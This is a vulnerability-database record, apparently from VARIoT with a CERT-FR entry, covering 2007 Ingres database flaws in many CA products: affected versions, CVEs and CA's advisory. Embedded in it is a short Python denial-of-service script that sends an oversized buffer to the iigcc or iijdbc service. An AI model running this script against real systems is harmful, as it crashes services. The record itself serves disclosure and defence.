Wily SOA Manager 7.1.

Impacted products

	Vendor	Product	Description

References

Title

Publication Time

Tags

Bulletins de sécurité Computer Associates du 21 juin 2007

None

vendor-advisory

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [],
  "affected_systems_content": "\u003cUL\u003e    \u003cLI\u003eIngres 2006 version 9.0.4 ;\u003c/LI\u003e    \u003cLI\u003eIngres r3 ;\u003c/LI\u003e    \u003cLI\u003eIngres 2.6 ;\u003c/LI\u003e    \u003cLI\u003eIngres 2.5.\u003c/LI\u003e  \u003c/UL\u003e  \u003cP\u003eLes versions vuln\u00e9rables d\u0027\u003cSPAN class=\"textit\"\u003eIngres\u003c/SPAN\u003e  sont int\u00e9gr\u00e9es dans les produits suivants :\u003c/P\u003e  \u003cUL\u003e    \u003cLI\u003eAdvantage Data Transformer r2.2 ;\u003c/LI\u003e    \u003cLI\u003eAllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1    ;\u003c/LI\u003e    \u003cLI\u003eAllFusion Harvest Change Manager r7, r7.1 ;\u003c/LI\u003e    \u003cLI\u003eBrightStor ARCserve Backup v9 (Linux seulement), r11.1,    r11.5 (Unix, Linux et Mainframe Linux) ;\u003c/LI\u003e    \u003cLI\u003eBrightStor ARCserve Backup for Laptops and Desktops r11.5    ;\u003c/LI\u003e    \u003cLI\u003eBrightStor Enterprise Backup (Unix seulement) t10.5 ;\u003c/LI\u003e    \u003cLI\u003eBrightStor Storage Command Center r11.5 ;\u003c/LI\u003e    \u003cLI\u003eBrightStor Storage Resource Manager r11.5 ;\u003c/LI\u003e    \u003cLI\u003eCleverPath Aio Business Rules Expert r10.1 ;\u003c/LI\u003e    \u003cLI\u003eCleverPath Predictive Analysis Server r3 ;\u003c/LI\u003e    \u003cLI\u003eDocServer 1.1 ;\u003c/LI\u003e    \u003cLI\u003eeTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2 ;\u003c/LI\u003e    \u003cLI\u003eeTrust Audit r8 SP2 ;\u003c/LI\u003e    \u003cLI\u003eeTrust Directory r8.1 ;\u003c/LI\u003e    \u003cLI\u003eeTrust IAM Suite r8.0 ;\u003c/LI\u003e    \u003cLI\u003eeTrust IAM Toolkit r8.0, r8.1 ;\u003c/LI\u003e    \u003cLI\u003eeTrust Identity Manager r8.1 ;\u003c/LI\u003e    \u003cLI\u003eeTrust Network Forensics r8.1 ;\u003c/LI\u003e    \u003cLI\u003eeTrust Secure Content Manager r8 ;\u003c/LI\u003e    \u003cLI\u003eeTrust Single Sign-On r7, r8, r8.1 ;\u003c/LI\u003e    \u003cLI\u003eeTrust Web Access Control 1.0 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Advanced Systems Management r11 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Asset Intelligence r11 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Asset Portfolio Management r11 r2.1, r11.3 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter CCS r11 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Database Command Center r11.1 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Desktop and Server Management r11 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Desktop Management Suite r11 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Enterprise Job Manager r1 SP3, r1 SP4 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Job Management Option r11 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Lightweight Portal 2 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Management Portal r3.1.1 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Network and Systems Management r3.0, r11 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Network and Systems Management - Tiered - Multi    Platform r3.0 0305, r3.1 0403, r11.0 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Patch Management r11 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Remote Control 6, r11 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Service Accounting r11, r11.1 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Service Assure r2.2, r11, r11.1 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Service Catalog r11, r11.1 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Service Delivery r11.0, r11.1 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Service Intelligence r11 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1    ;\u003c/LI\u003e    \u003cLI\u003eUnicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1,    r11, r11.1, r11.2 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Software Delivery r11 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter TNG 2.4, 2.4.2, 2.4.2J ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Workload Control Center r1 SP3, r1 SP4 ;\u003c/LI\u003e    \u003cLI\u003eUnicenter Web Services Distributed Management 3.11, 3.50    ;\u003c/LI\u003e    \u003cLI\u003eWily SOA Manager 7.1.\u003c/LI\u003e  \u003c/UL\u003e",
  "content": "## Description\n\nSept vuln\u00e9rabilit\u00e9s affectant la base de donn\u00e9es Ingres ont \u00e9t\u00e9 rendues\npubliques. Plusieurs de ces vuln\u00e9rabilit\u00e9s permettent l\u0027ex\u00e9cution de\ncode arbitraire \u00e0 distance, sans authentification pr\u00e9alable.\nL\u0027exploitation d\u0027une de ces vuln\u00e9rabilit\u00e9s se fait par l\u0027interm\u00e9diaire\nde paquets malform\u00e9s envoy\u00e9s aux services iigcc (port 10916/tcp) et\niigcd (port 10923/tcp).\n\n## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
  "cves": [
    {
      "name": "CVE-2007-3338",
      "url": "https://www.cve.org/CVERecord?id=CVE-2007-3338"
    },
    {
      "name": "CVE-2007-3334",
      "url": "https://www.cve.org/CVERecord?id=CVE-2007-3334"
    },
    {
      "name": "CVE-2007-3337",
      "url": "https://www.cve.org/CVERecord?id=CVE-2007-3337"
    },
    {
      "name": "CVE-2007-3336",
      "url": "https://www.cve.org/CVERecord?id=CVE-2007-3336"
    }
  ],
  "links": [],
  "reference": "CERTA-2007-AVI-275",
  "revisions": [
    {
      "description": "version initiale.",
      "revision_date": "2007-06-22T00:00:00.000000"
    },
    {
      "description": "ajout des produits affect\u00e9s int\u00e9grant une version vuln\u00e9rable d\u0027Ingres, ajout des r\u00e9f\u00e9rences CVE et d\u0027un bulletin de s\u00e9curit\u00e9 Computer Associates.",
      "revision_date": "2007-06-25T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    }
  ],
  "summary": "De multiples vuln\u00e9rabilit\u00e9s affectant la base de donn\u00e9es \u003cspan\nclass=\"textit\"\u003eIngres\u003c/span\u003e permettent l\u0027ex\u00e9cution de code arbitraire \u00e0\ndistance.\n",
  "title": "Multiples vuln\u00e9rabilit\u00e9s dans Ingres",
  "vendor_advisories": [
    {
      "published_at": null,
      "title": "Bulletins de s\u00e9curit\u00e9 Computer Associates du 21 juin 2007",
      "url": "http://www.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=145778"
    }
  ]
}

VAR-200706-0397

Vulnerability from variot - Updated: 2023-12-18 12:46

Multiple "pointer overwrite" vulnerabilities in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (formerly Computer Associates) products, allow remote attackers to execute arbitrary code by sending certain TCP data at different times to the Ingres Communications Server Process (iigcc), which calls the (1) QUinsert or (2) QUremove functions with attacker-controlled input. Ingress Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue. Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file. Title: [CAID 35450, 35451, 35452, 35453]: CA Products That Embed Ingres Multiple Vulnerabilities

CA Vuln ID (CAID): 35450, 35451, 35452, 35453

CA Advisory Date: 2007-06-21

Reported By: NGSSoftware, and iDefense

Impact: Attackers can potentially execute arbitrary code, or overwrite files. CA has issued fixes, to address all of these vulnerabilities, for all supported CA products that may be affected.

3) Ingres wakeup file overwrite (reported by NGSSoftware) [Ingres bug 115913, CVE-2007-3337, CAID 35451] Description: The "wakeup" binary creates a file named "alarmwkp.def" in the current directory, truncating the file if it already exists. The "wakeup" binary is setuid "ingres" and world-executable. Consequently, an attacker can truncate a file with the privileges of the "ingres" user.

4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) [Ingres bug 115911, CVE-2007-3338, CAID 35452] Description: An attacker can pass a long string as an argument to uuid_from_char() to cause a stack buffer overflow and the saved returned address can be overwritten.

5) Ingres verifydb local stack overflow (reported by NGSSoftware) [Ingres bug 115911, CVE-2007-3338, CAID 35452] Description: A local attacker can exploit a stack overflow in the Ingres verifydb utility duve_get_args function.

6) Communication server heap corruption (reported by iDefense) [Ingres bug 117523, CVE-2007-3334, CAID 35453] Description: An attacker can execute arbitrary code within the context of the communications server (iigcc.exe). This only affects Ingres on the Windows operating system. Reported by iDefense as IDEF2023.

7) Data Access/JDBC server heap corruption (reported by iDefense) [Ingres bug 117523, CVE-2007-3334, CAID 35453] Description: An attacker can execute arbitrary code within the context of the Data Access server (iigcd.exe) in r3 or the JDCB server in older releases. This only affects Ingres on the Windows operating system. Reported by iDefense as IDEF2022.

Mitigating Factors: None

Severity: CA has given these vulnerabilities a cumulative High risk rating.

Affected Products: Advantage Data Transformer r2.2 AllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1 AllFusion Harvest Change Manager r7, r7.1 BrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, Linux and Mainframe Linux) BrightStor ARCserve Backup for Laptops and Desktops r11.5 BrightStor Enterprise Backup (Unix only) r10.5 BrightStor Storage Command Center r11.5 BrightStor Storage Resource Manager r11.5 CleverPath Aion Business Rules Expert r10.1 CleverPath Aion Business Process Monitoring r10.1 CleverPath Predictive Analysis Server r3 DocServer 1.1 eTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2 eTrust Audit r8 SP2 eTrust Directory r8.1 eTrust IAM Suite r8.0 eTrust IAM Toolkit r8.0, r8.1 eTrust Identity Manager r8.1 eTrust Network Forensics r8.1 eTrust Secure Content Manager r8 eTrust Single Sign-On r7, r8, r8.1 eTrust Web Access Control 1.0 Unicenter Advanced Systems Management r11 Unicenter Asset Intelligence r11 Unicenter Asset Management r11 Unicenter Asset Portfolio Management r11.2.1, r11.3 Unicenter CCS r11 Unicenter Database Command Center r11.1 Unicenter Desktop and Server Management r11 Unicenter Desktop Management Suite r11 Unicenter Enterprise Job Manager r1 SP3, r1 SP4 Unicenter Job Management Option r11 Unicenter Lightweight Portal 2 Unicenter Management Portal r3.1.1 Unicenter Network and Systems Management r3.0, r11 Unicenter Network and Systems Management - Tiered - Multi Platform r3.0 0305, r3.1 0403, r11.0 Unicenter Patch Management r11 Unicenter Remote Control 6, r11 Unicenter Service Accounting r11, r11.1 Unicenter Service Assure r2.2, r11, r11.1 Unicenter Service Catalog r11, r11.1 Unicenter Service Delivery r11.0, r11.1 Unicenter Service Intelligence r11 Unicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1 Unicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, r11.1, r11.2 Unicenter Software Delivery r11 Unicenter TNG 2.4, 2.4.2, 2.4.2J Unicenter Workload Control Center r1 SP3, r1 SP4 Unicenter Web Services Distributed Management 3.11, 3.50 Wily SOA Manager 7.1

Affected Platforms: All operating system platforms supported by the various CA products that embed Ingres. This includes Windows, Linux, and supported UNIX platforms.

Status and Recommendation: CA recommends that customers apply the appropriate fix(es) listed on the Security Notice page: http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp

Workaround: None

References (URLs may wrap): CA SupportConnect: http://supportconnect.ca.com/ CA SupportConnect Security Notice for these vulnerabilities: Ingres Security Alert http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp Important Security Notice for Customers Using Products That Embed Ingres http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp CA Security Advisor posting: CA Products That Embed Ingres Multiple Vulnerabilities http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778 CA Vuln ID (CAID): 35450, 35451, 35452, 35453 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453 Ingres knowledge base document: http://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl Reported By: NGSSoftware, and iDefense NGSSoftware Advisory: http://www.ngssoftware.com/research/advisories/ iDefense Advisory: Ingres Database Multiple Heap Corruption Vulnerabilities http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546 CVE References: CVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334 OSVDB References: Pending http://osvdb.org/

Changelog for this advisory: v1.0 - Initial Release

Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com.

For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.

If you discover a vulnerability in CA products, please report your findings to vuln AT ca DOT com, or utilize our "Submit a Vulnerability" form. URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx

Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research

CA, 1 CA Plaza, Islandia, NY 11749

Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2007 CA. All rights reserved. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities

Date: 2010-08-14

Author: fdisk

Version: 2.6

Tested on: Windows 2003 Server SP1 en

CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338

Notes: Fixed in the last version.

please let me know if you are/were able to get code execution

import socket import sys

if len(sys.argv) != 4: print "Usage: ./CAAdvantageDoS.py " print "Vulnerable Services: iigcc, iijdbc" sys.exit(1)

host = sys.argv[1] port = int(sys.argv[2]) service = sys.argv[3]

if service == "iigcc": payload = "\x41" * 2106 elif service == "iijdbc": payload = "\x41" * 1066 else: print "Vulnerable Services: iigcc, iijdbc" sys.exit(1)

payload += "\x42" * 4

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) print "Sending payload" s.send(payload) data = s.recv(1024) s.close() print 'Received', repr(data)

print service + " crashed"

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200706-0397",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "database server",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "ingres",
        "version": "r3"
      },
      {
        "model": "database server",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "ingres",
        "version": "2.6"
      },
      {
        "model": "database server",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "ingres",
        "version": "2.5"
      },
      {
        "model": "database server",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "ingres",
        "version": "9.0.4"
      },
      {
        "model": "database server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ingres",
        "version": "2006 9.0.4"
      },
      {
        "model": "database server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "ingres",
        "version": "and  2.5"
      },
      {
        "model": "database",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ingres",
        "version": "20060"
      },
      {
        "model": "database",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ingres",
        "version": "3.0.3"
      },
      {
        "model": "database",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ingres",
        "version": "2.6"
      },
      {
        "model": "database",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ingres",
        "version": "2.5"
      },
      {
        "model": "associates wily soa manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "7.1"
      },
      {
        "model": "associates unicenter workload control center 1.0.sp4",
        "scope": null,
        "trust": 0.3,
        "vendor": "computer",
        "version": null
      },
      {
        "model": "associates unicenter workload control center sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "1.0"
      },
      {
        "model": "associates unicenter tng",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "2.4.2"
      },
      {
        "model": "associates unicenter tng",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "2.2"
      },
      {
        "model": "associates unicenter tng 2.4.2j",
        "scope": null,
        "trust": 0.3,
        "vendor": "computer",
        "version": null
      },
      {
        "model": "associates unicenter software delivery",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates unicenter serviceplus service desk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "6.0"
      },
      {
        "model": "associates unicenter serviceplus service desk sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "6.0"
      },
      {
        "model": "associates unicenter serviceplus service desk sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "5.5"
      },
      {
        "model": "associates unicenter serviceplus service desk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.2"
      },
      {
        "model": "associates unicenter serviceplus service desk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.1"
      },
      {
        "model": "associates unicenter serviceplus service desk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates unicenter service metric analysis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "3.5"
      },
      {
        "model": "associates unicenter service metric analysis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "3.0.2"
      },
      {
        "model": "associates unicenter service metric analysis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.1"
      },
      {
        "model": "associates unicenter service metric analysis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates unicenter service intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates unicenter service delivery",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.0"
      },
      {
        "model": "associates unicenter service delivery",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.1"
      },
      {
        "model": "associates unicenter service catalog",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates unicenter service assure",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "2.2"
      },
      {
        "model": "associates unicenter service assure",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.1"
      },
      {
        "model": "associates unicenter service assure",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates unicenter remote control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "6.0"
      },
      {
        "model": "associates unicenter remote control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates unicenter patch management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates unicenter network and systems management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "3.1"
      },
      {
        "model": "associates unicenter network and systems management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "3.0"
      },
      {
        "model": "associates unicenter network and systems management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates unicenter management portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "3.1.1"
      },
      {
        "model": "associates unicenter lightweight portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "2"
      },
      {
        "model": "associates unicenter job management option",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.0"
      },
      {
        "model": "associates unicenter enterprise job manager sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "1.0"
      },
      {
        "model": "associates unicenter enterprise job manager sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "1.0"
      },
      {
        "model": "associates unicenter desktop management suite",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates unicenter desktop and server management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates unicenter database command center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.1"
      },
      {
        "model": "associates unicenter ca web services distributed management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "3.5"
      },
      {
        "model": "associates unicenter ca web services distributed management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "3.11"
      },
      {
        "model": "associates unicenter asset portfolio management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.2.1"
      },
      {
        "model": "associates unicenter asset portfolio management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.0"
      },
      {
        "model": "associates unicenter asset portfolio management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.3"
      },
      {
        "model": "associates unicenter asset management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates unicenter asset intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates unicenter advanced systems management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates etrust web access control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "1.0"
      },
      {
        "model": "associates etrust single sign-on",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "8.1"
      },
      {
        "model": "associates etrust single sign-on",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "8"
      },
      {
        "model": "associates etrust single sign-on",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "7"
      },
      {
        "model": "associates etrust secure content manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "8.0"
      },
      {
        "model": "associates etrust network forensics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "8.1"
      },
      {
        "model": "associates etrust identity manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "8.1"
      },
      {
        "model": "associates etrust iam toolkit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "8.1"
      },
      {
        "model": "associates etrust iam toolkit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "8"
      },
      {
        "model": "associates etrust iam suite",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "8"
      },
      {
        "model": "associates etrust directory",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "8.1"
      },
      {
        "model": "associates etrust audit r8",
        "scope": null,
        "trust": 0.3,
        "vendor": "computer",
        "version": null
      },
      {
        "model": "associates etrust admin",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "8.1"
      },
      {
        "model": "associates etrust admin",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "8.0"
      },
      {
        "model": "associates etrust admin sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "8.1"
      },
      {
        "model": "associates etrust admin sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "8.1"
      },
      {
        "model": "associates docserver",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "1.1"
      },
      {
        "model": "associates cleverpath predictive analysis server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "3.0"
      },
      {
        "model": "associates cleverpath aion bre",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "10.1"
      },
      {
        "model": "associates cleverpath aion bpm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "10.1"
      },
      {
        "model": "associates ccs",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11"
      },
      {
        "model": "associates brightstor storage resource manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.5"
      },
      {
        "model": "associates brightstor storage command center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.5"
      },
      {
        "model": "associates brightstor enterprise backup for tru64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "10.5"
      },
      {
        "model": "associates brightstor enterprise backup for solaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "10.5"
      },
      {
        "model": "associates brightstor enterprise backup for hp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "10.5"
      },
      {
        "model": "associates brightstor enterprise backup for aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "10.5"
      },
      {
        "model": "associates brightstor arcserve backup for linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.1"
      },
      {
        "model": "associates brightstor arcserve backup for linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "9.0"
      },
      {
        "model": "associates brightstor arcserve backup",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.1"
      },
      {
        "model": "associates brightstor arcserve backup",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.5"
      },
      {
        "model": "associates arcserve backup for laptops and desktops",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "11.5"
      },
      {
        "model": "associates allfusion harvest change manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "7.1"
      },
      {
        "model": "associates allfusion harvest change manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "7"
      },
      {
        "model": "associates allfusion enterprise workbench",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "7.1"
      },
      {
        "model": "associates allfusion enterprise workbench",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "7"
      },
      {
        "model": "associates allfusion enterprise workbench sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "1.1"
      },
      {
        "model": "associates allfusion enterprise workbench",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "1.1"
      },
      {
        "model": "associates advantage data transformer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "computer",
        "version": "2.2"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "24585"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-004027"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3336"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200706-389"
      }
